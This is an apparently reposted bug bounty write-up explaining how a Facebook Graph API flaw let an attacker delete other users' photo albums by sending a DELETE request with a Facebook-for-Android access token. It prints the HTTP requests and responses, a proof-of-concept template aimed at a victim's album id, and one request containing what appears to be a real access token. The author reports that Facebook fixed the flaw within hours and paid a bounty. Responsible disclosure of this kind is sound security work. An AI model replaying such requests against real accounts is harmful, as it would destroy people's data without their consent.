How I Hacked Your Facebook Photos

[Nytro]

How I Hacked Your Facebook Photos

What if your photos get deleted without your knowledge?

Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted.

Graph API is primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here.

According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API.

I tried to delete one of my photo albums using graph explorer access token.

Request :-

DELETE /518171421550249 HTTP/1.1

Host : graph.facebook.com

Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbaj NEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVl aDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hl aSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKs GJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call

I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn't it? Yeah and also it uses the same Graph API. so took a album id & Facebook for android access token of mine and tried it.

Request :-

DELETE /518171421550249 HTTP/1.1

Host : graph.facebook.com

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response :-

true

Album(518171421550249) got deleted so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result.

Request :-

DELETE /518171421550249 HTTP/1.1

Host : graph.facebook.com

Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response :-

true

OMG the album got deleted! So i got access to delete all of your Facebook photos (photos which are public or the photos i could see) lol

Immediately reported this bug to Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgement of the report.

Final Proof Of Concept :-

Request :-

DELETE /<Victim's_photo_album_id> HTTP/1.1

Host : graph.facebook.com

Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

if you aren't sure about how to do it, please see this video

First acknowledgement from Facebook security team

Acknowledgement of fix and rewarded me $12500 USD for reporting this vulnerability.

Now its completely fixed.

Thank you Facebook Security Team for running bug bounty program and also for quickly fixing this issue

Soon i ll get my listed for the year 2015

HALL OF FAME : https://www.facebook.com/whitehat/thanks

Posted by Laxman Muthiyah at 00:30

Sursa: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html